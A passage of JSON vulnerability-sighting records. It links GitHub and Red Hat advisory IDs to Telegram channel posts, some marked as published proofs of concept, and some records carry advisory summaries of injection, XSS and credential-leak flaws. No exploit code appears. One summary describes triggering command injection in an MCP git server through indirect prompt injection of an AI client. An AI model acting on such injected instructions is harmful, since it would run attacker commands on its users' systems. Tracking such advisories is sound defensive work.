"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q4JV-XWJX-37CP", "type": "published-proof-of-concept", "source": "Telegram/evyU1N_0NEzlqWkLQZaMrYM3OKb94J6CqLDhasOVakxq7P0", "content": "", "creation_timestamp": "2025-06-02T17:01:55.000000Z"}, {"uuid": "e38d3259-556b-4ea7-af37-ac1058c2a1a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F82J-8PP7-CW2W", "type": "published-proof-of-concept", "source": "Telegram/evyU1N_0NEzlqWkLQZaMrYM3OKb94J6CqLDhasOVakxq7P0", "content": "", "creation_timestamp": "2025-06-02T17:01:55.000000Z"}, {"uuid": "598487a5-cdeb-4c92-9bc7-a8da144ec9f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-859R-VVV8-RM8R", "type": "published-proof-of-concept", "source": "Telegram/evyU1N_0NEzlqWkLQZaMrYM3OKb94J6CqLDhasOVakxq7P0", "content": "", "creation_timestamp": "2025-06-02T17:01:55.000000Z"}, {"uuid": "0a9bc4cf-5679-441f-994b-dc53a0b9c14d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CJ5-5RVV-WF4V", "type": "published-proof-of-concept", "source": "Telegram/M9ruxIqfssiRmufIiVDPBVG9309mAKgr9KyLQB_BOZAkMKU", "content": "", "creation_timestamp": "2025-06-02T20:00:25.000000Z"}, {"uuid": "a59b978d-6e89-4b70-a04f-e18b56e69902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3CRH-39QV-FXJ7", "type": "published-proof-of-concept", "source": "Telegram/P3uzVteJIOiG3Gg-zKek4C3h9lNxS0xZPtAdcuiBiGsp_Ws", "content": "", "creation_timestamp": "2025-06-11T11:03:44.000000Z"}, {"uuid": "f024fabf-0e18-48ae-92c9-cbbc7a00c27b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W36R-9JVX-Q48V", "type": "published-proof-of-concept", "source": "Telegram/llanlRrbf3s9Rf868KZ425GV5KlSiI6fIpB3qhtKPPXkg-A", "content": "", "creation_timestamp": "2025-06-23T18:30:40.000000Z"}, {"uuid": "9ddff54e-1f0d-4b9d-8e7e-dd370aa26a46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H7CP-R72F-JXH6", "type": "published-proof-of-concept", "source": "Telegram/1psvC7CezRzDdQQ_ZmPDn29p4dA-tBW5Fs_x58qYiO8Q7Mk", "content": "", "creation_timestamp": "2025-06-23T20:01:16.000000Z"}, {"uuid": "564a0a78-8bb0-456f-9285-67711630a406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V62P-RQ8G-8H59", "type": "published-proof-of-concept", "source": "Telegram/O2eh7gLrpcZbONgN5-OX68m3ZbpQKWlr4HE6_2LMc1M7414", "content": "", "creation_timestamp": "2025-06-23T20:32:26.000000Z"}, {"uuid": "02cc3f94-64bc-4aa4-b485-9d0b9021702a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VX8-V79M-6M24", "type": "published-proof-of-concept", "source": "Telegram/O2eh7gLrpcZbONgN5-OX68m3ZbpQKWlr4HE6_2LMc1M7414", "content": "", "creation_timestamp": "2025-06-23T20:32:26.000000Z"}, {"uuid": "f3a5984f-6f05-44ef-96ef-3f4480035169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HWPG-X5HW-VPV9", "type": "seen", "source": "Telegram/3KuJxnL-u9Q1MXHm7LBK-vI_Sfp2Lp9FG_xNigrPHhkXm0g", "content": "", "creation_timestamp": "2025-06-23T21:31:05.000000Z"}, {"uuid": "f94dd4e5-5db1-4afa-b3f2-538c95b853f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43G3-QPWQ-HFGG", "type": "seen", "source": "Telegram/3KuJxnL-u9Q1MXHm7LBK-vI_Sfp2Lp9FG_xNigrPHhkXm0g", "content": "", "creation_timestamp": "2025-06-23T21:31:05.000000Z"}, {"uuid": "94b9c2d4-6334-4b6c-9937-63621f16758e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QX2M-RCPC-V43V", "type": "seen", "source": "https://t.me/HackerOne/3831", "content": "https://github.com/google/security-research/security/advisories/GHSA-qx2m-rcpc-v43v", "creation_timestamp": "2025-06-07T20:24:57.000000Z"}, {"uuid": "752ca1f4-0bee-4591-99bb-1867e3a70f8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18929", "content": "https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6\n\ncve-2024-47062\n\n#github #poc", "creation_timestamp": "2024-09-26T11:12:38.000000Z"}, {"uuid": "5336958a-0f75-4e9c-aeb7-78a3ab024813", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9V3M-8FP8-MJ99", "type": "seen", "source": "Telegram/KQJ2fokDRUpEEMEdtilLJpNYW94QEwCQWFCqP7BH6XiY", "content": "", "creation_timestamp": "2024-09-12T10:16:41.000000Z"}, {"uuid": "2d413a55-3021-4418-851e-cda72d736e91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GW94-85M2-X8V2", "type": "seen", "source": "https://t.me/bdufstecru/3258", "content": "", "creation_timestamp": "2026-07-14T01:00:05.838815Z"}, {"uuid": "38254037-7e25-491b-9882-8abacb185a8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7874", "type": "seen", "source": "https://t.me/ctinow/155754", "content": "https://ift.tt/Me8wLjZ\nRHSA-2023:7874: Important: gstreamer1-plugins-bad-free security update", "creation_timestamp": "2023-12-18T09:17:44.000000Z"}, {"uuid": "176b6ecf-4654-494b-8a27-c388e3c9e4d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7875", "type": "seen", "source": "https://t.me/ctinow/155753", "content": "https://ift.tt/UhAluM0\nRHSA-2023:7875: Important: gstreamer1-plugins-bad-free security update", "creation_timestamp": "2023-12-18T09:17:43.000000Z"}, {"uuid": "662b14e7-ccd9-4f67-83ab-74194e513f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7878", "type": "seen", "source": "https://t.me/ctinow/155752", "content": "https://ift.tt/sN4cWab\nRHSA-2023:7878: Important: postgresql:10 security update", "creation_timestamp": "2023-12-18T09:17:42.000000Z"}, {"uuid": "75741228-6f89-4ba5-95df-091671aaea8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WMJ-46RJ-QM2W", "type": "seen", "source": "https://t.me/ctinow/156945", "content": "https://ift.tt/1vpiIjK\nCVE-2023-49097 | Zitadel up to 2.39.8/2.40.9/2.41.5 Header X-Forwarded-Host password recovery (GHSA-2wmj-46rj-qm2w)", "creation_timestamp": "2023-12-20T13:18:04.000000Z"}, {"uuid": "21713906-298d-4dbc-976b-eedddbbac1b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HPVM-X7M8-3C6X", "type": "seen", "source": "https://t.me/ctinow/156934", "content": "https://ift.tt/jq40wTA\nCVE-2023-49091 | azukaar Cosmos-Server up to 0.12.x Authorization Header session expiration (GHSA-hpvm-x7m8-3c6x)", "creation_timestamp": "2023-12-20T12:36:56.000000Z"}, {"uuid": "e1a9d4cf-9c4e-4c3f-beed-88c1336b8df4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ59-4Q6R-635R", "type": "seen", "source": "https://t.me/ctinow/156688", "content": "https://ift.tt/jQzpJhF\n[GHSA-wq59-4q6r-635r] Authentication bypass vulnerability in navidrome's subsonic endpoint", "creation_timestamp": "2023-12-20T00:47:51.000000Z"}, {"uuid": "c6a2d729-3d77-43a3-a527-c43e098a1ba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9WGG-M99Q-HHFC", "type": "seen", "source": "https://t.me/ctinow/156676", "content": "https://ift.tt/bsmLtcH\n[GHSA-9wgg-m99q-hhfc] Expired tokens can be renewed without validating the account password", "creation_timestamp": "2023-12-20T00:22:46.000000Z"}, {"uuid": "968d1650-3c89-40a1-abf5-be3a35fdbaf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFXJ-XF67-X723", "type": "seen", "source": "https://t.me/ctinow/156612", "content": "https://ift.tt/idQUYJr\n[GHSA-jfxj-xf67-x723] Apache Superset SQL injection vulnerability", "creation_timestamp": "2023-12-19T22:27:27.000000Z"}, {"uuid": "018d76d8-8a1d-4d50-bdd5-80708a6be99e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95MG-JGFX-54V9", "type": "seen", "source": "https://t.me/ctinow/156606", "content": "https://ift.tt/6s2PexJ\n[GHSA-95mg-jgfx-54v9] Apache Superset uncontrolled resource consumption", "creation_timestamp": "2023-12-19T22:17:49.000000Z"}, {"uuid": "a90e5a47-95a2-43ce-897a-bb7aaa6c8419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JX6Q-FQ9H-6G7Q", "type": "seen", "source": "https://t.me/ctinow/156596", "content": "https://ift.tt/D9eO8ko\n[GHSA-jx6q-fq9h-6g7q] Pedroetb TTS-API OS Command Injection", "creation_timestamp": "2023-12-19T22:12:00.000000Z"}, {"uuid": "ea8004d5-4026-4d92-94b5-98eb019aa2e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8VH-P74J-X9XP", "type": "seen", "source": "https://t.me/ctinow/156123", "content": "https://ift.tt/5FcKJ7b\n[GHSA-w8vh-p74j-x9xp] yii2-authclient vulnerable to possible timing attack on string comparison in OAuth1, OAuth2 and OpenID Connect implementation", "creation_timestamp": "2023-12-18T21:18:06.000000Z"}, {"uuid": "0fcb3d79-5d50-4544-8f04-39881bc80d58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8XX-8VM8-X6WJ", "type": "seen", "source": "https://t.me/ctinow/156098", "content": "https://ift.tt/KWU7xyt\n[GHSA-r8xx-8vm8-x6wj] Resque vulnerable to Reflected Cross Site Scripting through pathnames", "creation_timestamp": "2023-12-18T20:48:16.000000Z"}, {"uuid": "91063c2e-c9b8-4f50-bc29-89b0cde8d700", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GC3J-VVWF-4RP8", "type": "seen", "source": "https://t.me/ctinow/156097", "content": "https://ift.tt/LwhY4NQ\n[GHSA-gc3j-vvwf-4rp8] Resque vulnerable to reflected XSS in resque-web failed and queues lists", "creation_timestamp": "2023-12-18T20:48:15.000000Z"}, {"uuid": "3b3955e7-2260-421c-9a3b-fd8b4196fc9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R9MQ-M72X-257G", "type": "seen", "source": "https://t.me/ctinow/156096", "content": "https://ift.tt/IpvP0d1\n[GHSA-r9mq-m72x-257g] Resque vulnerable to reflected XSS in Queue Endpoint", "creation_timestamp": "2023-12-18T20:48:14.000000Z"}, {"uuid": "2f7bf010-988a-4e70-b8d9-7517bebd0d9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9HMQ-FM33-X4XX", "type": "seen", "source": "https://t.me/ctinow/156095", "content": "https://ift.tt/y5IhB8Q\n[GHSA-9hmq-fm33-x4xx] Resque Scheduler Reflected XSS In Delayed Jobs View", "creation_timestamp": "2023-12-18T20:48:13.000000Z"}, {"uuid": "1367f341-f066-4a6b-994c-dde032674c0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVG2-7C3J-G36J", "type": "seen", "source": "https://t.me/ctinow/156094", "content": "https://ift.tt/7dP9v3k\n[GHSA-cvg2-7c3j-g36j] Keycloak vulnerable to reflected XSS via wildcard in OIDC redirect_uri", "creation_timestamp": "2023-12-18T20:48:11.000000Z"}, {"uuid": "bf0b6fa9-29f9-4a2f-a375-9623fad66be3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46X4-W2FM-5X6G", "type": "seen", "source": "https://t.me/ctinow/157069", "content": "https://ift.tt/SY41JtF\nCVE-2023-49077 | Mailcow prior 2023-11 Quarantine UI cross site scripting (GHSA-46x4-w2fm-5x6g)", "creation_timestamp": "2023-12-20T15:18:38.000000Z"}, {"uuid": "821423aa-7547-4742-8953-fbc1f6906851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7873", "type": "seen", "source": "https://t.me/ctinow/156329", "content": "https://ift.tt/WYztvAj\nRHSA-2023:7873: Important: gstreamer1-plugins-bad-free security update", "creation_timestamp": "2023-12-19T11:17:47.000000Z"}, {"uuid": "c87f84e8-5250-4cc6-8808-a3ea5d28373d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7885", "type": "seen", "source": "https://t.me/ctinow/156879", "content": "https://ift.tt/czNIb2K\nRHSA-2023:7885: Important: postgresql:15 security update", "creation_timestamp": "2023-12-20T11:18:01.000000Z"}, {"uuid": "9f0b0302-4fcf-42bf-ad0a-edf3bd25e16d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32GQ-X56H-299C", "type": "seen", "source": "https://t.me/cvedetector/13384", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56327 - pyrage Depwiseage Denial of Service\", \n  \"Content\": \"CVE ID : CVE-2024-56327 \nPublished : Dec. 19, 2024, 11:15 p.m. | 28\u00a0minutes ago \nDescription : pyrage is a set of Python bindings for the rage file encryption library (age in Rust). `pyrage` uses the Rust `age` crate for its underlying operations, and `age` is vulnerable to GHSA-4fg7-vxc8-qx5w. All details of GHSA-4fg7-vxc8-qx5w are relevant to `pyrage` for the versions specified in this advisory. See GHSA-4fg7-vxc8-qx5w for full details. Versions of `pyrage` before 1.2.0 lack plugin support and are therefore **not affected**. An equivalent issue was fixed in [the reference Go implementation of age](), see advisory GHSA-32gq-x56h-299c. This issue has been addressed in version 1.2.3 and all users are advised to update. There are no known workarounds for this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-20T00:51:24.000000Z"}, {"uuid": "0c891cf5-b6ee-4fb1-8301-7fa01d032d12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4FG7-VXC8-QX5W", "type": "seen", "source": "https://t.me/cvedetector/13384", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56327 - pyrage Depwiseage Denial of Service\", \n  \"Content\": \"CVE ID : CVE-2024-56327 \nPublished : Dec. 19, 2024, 11:15 p.m. | 28\u00a0minutes ago \nDescription : pyrage is a set of Python bindings for the rage file encryption library (age in Rust). `pyrage` uses the Rust `age` crate for its underlying operations, and `age` is vulnerable to GHSA-4fg7-vxc8-qx5w. All details of GHSA-4fg7-vxc8-qx5w are relevant to `pyrage` for the versions specified in this advisory. See GHSA-4fg7-vxc8-qx5w for full details. Versions of `pyrage` before 1.2.0 lack plugin support and are therefore **not affected**. An equivalent issue was fixed in [the reference Go implementation of age](), see advisory GHSA-32gq-x56h-299c. This issue has been addressed in version 1.2.3 and all users are advised to update. There are no known workarounds for this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-20T00:51:24.000000Z"}, {"uuid": "c31e89a7-819a-4ce3-be9b-4e3da761736f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7876", "type": "seen", "source": "https://t.me/ctinow/156328", "content": "https://ift.tt/NepImbQ\nRHSA-2023:7876: Moderate: opensc security update", "creation_timestamp": "2023-12-19T11:17:46.000000Z"}, {"uuid": "9a7bcb29-f35d-46cd-939c-b1a6e47a85ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7877", "type": "seen", "source": "https://t.me/ctinow/156327", "content": "https://ift.tt/NALDaeb\nRHSA-2023:7877: Low: openssl security update", "creation_timestamp": "2023-12-19T11:17:45.000000Z"}, {"uuid": "f502e137-01ae-4ade-b53c-7d7c1a57f57a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G56X-7J6W-G8R8", "type": "seen", "source": "https://t.me/ctinow/156209", "content": "https://ift.tt/aT42gcY\n[GHSA-g56x-7j6w-g8r8] Grackle has StackOverflowError in GraphQL query processing", "creation_timestamp": "2023-12-19T00:31:36.000000Z"}, {"uuid": "8d35ac4f-d64b-407d-aa73-fb065ff0b515", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4H72-34J6-J8X7", "type": "seen", "source": "https://t.me/ctinow/156093", "content": "https://ift.tt/NBP7sSL\n[GHSA-4h72-34j6-j8x7] Maloja error page XSS vulnerability", "creation_timestamp": "2023-12-18T20:48:10.000000Z"}, {"uuid": "dfc0a557-e331-4537-a68c-806aecc0cef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R3H-V4HX-RHFR", "type": "published-proof-of-concept", "source": "Telegram/beRkyaQYF6-HbSXwJObWqlvUpmDU_mKmHxxmaYmzALf1MGQ", "content": "", "creation_timestamp": "2026-04-15T01:19:46.000000Z"}, {"uuid": "ad25401d-9953-45a3-a135-1148bb381bb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HW5-45GM-FJ88", "type": "published-proof-of-concept", "source": "Telegram/uZRx6HZozAc0thMR3KKbNyvZVgKIzeeLzgWMgVKyfbYH8EA", "content": "", "creation_timestamp": "2026-04-15T15:20:23.000000Z"}, {"uuid": "3f44ee6d-bbdb-40e1-8bd9-2263b324122f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GWHP-PF74-VJ37", "type": "published-proof-of-concept", "source": "Telegram/uZRx6HZozAc0thMR3KKbNyvZVgKIzeeLzgWMgVKyfbYH8EA", "content": "", "creation_timestamp": "2026-04-15T15:20:23.000000Z"}, {"uuid": "1b654fa2-274f-42fe-a09e-f9bac97bd783", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M43G-M425-P68X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/20073", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53103\n\ud83d\udd25 CVSS Score: 5.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: JUnit is a testing framework for Java and the JVM. From version 5.12.0 to 5.13.1, JUnit's support for writing Open Test Reporting XML files can leak Git credentials. The impact depends on the level of the access token exposed through the OpenTestReportGeneratingListener. If these test reports are published or stored anywhere public, then there is the possibility that a rouge attacker can steal the token and perform elevated actions by impersonating the user or app. This issue as been patched in version 5.13.2.\n\ud83d\udccf Published: 2025-07-01T18:02:39.060Z\n\ud83d\udccf Modified: 2025-07-01T18:50:18.904Z\n\ud83d\udd17 References:\n1. https://github.com/junit-team/junit-framework/security/advisories/GHSA-m43g-m425-p68x\n2. https://github.com/junit-team/junit-framework/commit/d4fc834c8c1c0b3168cd030c13551d1d041f51bc", "creation_timestamp": "2025-07-01T19:09:19.000000Z"}, {"uuid": "2b6ab9f9-d880-4df2-abb6-ead0b398fbc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3Q26-F695-PP76", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/20067", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53107\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: @cyanheads/git-mcp-server is an MCP server designed to interact with Git repositories. Prior to version 2.1.5, there is a command injection vulnerability caused by the unsanitized use of input parameters within a call to child_process.exec, enabling an attacker to inject arbitrary system commands. Successful exploitation can lead to remote code execution under the server process's privileges. The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (|, &gt;, &amp;&amp;, etc.). An MCP Client can be instructed to execute additional actions for example via indirect prompt injection when asked to read git logs. This issue has been patched in version 2.1.5.\n\ud83d\udccf Published: 2025-07-01T17:55:30.726Z\n\ud83d\udccf Modified: 2025-07-01T17:55:30.726Z\n\ud83d\udd17 References:\n1. https://github.com/cyanheads/git-mcp-server/security/advisories/GHSA-3q26-f695-pp76\n2. https://github.com/cyanheads/git-mcp-server/commit/0dbd6995ccdf76ab770b58013034365b2d06c4d9\n3. https://github.com/cyanheads/git-mcp-server/releases/tag/v2.1.5", "creation_timestamp": "2025-07-01T18:08:58.000000Z"}, {"uuid": "de3b5373-cf47-4ecd-af5b-4c51c81b7bf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FHQ6-JF5Q-QXVQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/20070", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53100\n\ud83d\udd25 CVSS Score: 8.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: RestDB's Codehooks.io MCP Server is an MCP server on the Codehooks.io platform. Prior to version 0.2.2, the MCP server is written in a way that is vulnerable to command injection attacks as part of some of its MCP Server tools definition and implementation. This could result in a user initiated remote command injection attack on a running MCP Server. This issue has been patched in version 0.2.2.\n\ud83d\udccf Published: 2025-07-01T17:49:54.733Z\n\ud83d\udccf Modified: 2025-07-01T17:49:54.733Z\n\ud83d\udd17 References:\n1. https://github.com/RestDB/codehooks-mcp-server/security/advisories/GHSA-fhq6-jf5q-qxvq\n2. https://github.com/RestDB/codehooks-mcp-server/commit/62f918a6fde6a8c700521b542b85315c70f05794\n3. https://github.com/RestDB/codehooks-mcp-server/commit/83db1d1b4c856cbe4a1b961d315706198bb0ffb8", "creation_timestamp": "2025-07-01T18:09:03.000000Z"}, {"uuid": "3165965a-bf91-4c11-bf6f-92ba1e1fae86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C799-4WW6-Q93W", "type": "published-proof-of-concept", "source": "Telegram/wieF1Cc87yTCfYHn4YFnWJ1bAgxO-EGJdmyMzATQMYWieSQ", "content": "", "creation_timestamp": "2026-04-24T05:18:33.000000Z"}, {"uuid": "b77f7950-4c36-4468-b400-f7a389ef6c37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FPJQ-C37H-CQCV", "type": "seen", "source": "Telegram/cyG2ZGhRnNebdsiXH3f8wG9rKkH4KFMg55z2RECZJhW1k7c", "content": "", "creation_timestamp": "2026-04-24T05:19:04.000000Z"}, {"uuid": "ab10716e-8121-4a2b-a12f-ad89f9901314", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1884", "type": "seen", "source": "Telegram/4zRGsEPwCWPOVkiJwGYn1R_sXuEnR_EKMT0DdgACfDkyyoA", "content": "", "creation_timestamp": "2026-04-20T21:21:38.000000Z"}, {"uuid": "3e2ac31f-7736-4e22-8138-0295601f7c28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1885", "type": "seen", "source": "Telegram/4zRGsEPwCWPOVkiJwGYn1R_sXuEnR_EKMT0DdgACfDkyyoA", "content": "", "creation_timestamp": "2026-04-20T21:21:38.000000Z"}, {"uuid": "22ce6ea5-6a3d-4626-b02d-9dc69d0d784f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3J5Q-7Q7H-2HHV", "type": "seen", "source": "Telegram/afpqx5U4BmLApg0vDDGxSmW2u1LMTzTENI3LCYVeeaEOYCo", "content": "", "creation_timestamp": "2026-04-20T21:22:08.000000Z"}, {"uuid": "50743984-536f-41e6-b478-49f717ca0d71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9G44-8XV2-F2M9", "type": "seen", "source": "Telegram/afpqx5U4BmLApg0vDDGxSmW2u1LMTzTENI3LCYVeeaEOYCo", "content": "", "creation_timestamp": "2026-04-20T21:22:08.000000Z"}, {"uuid": "f3106651-b664-4100-a625-8f65389eae30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", 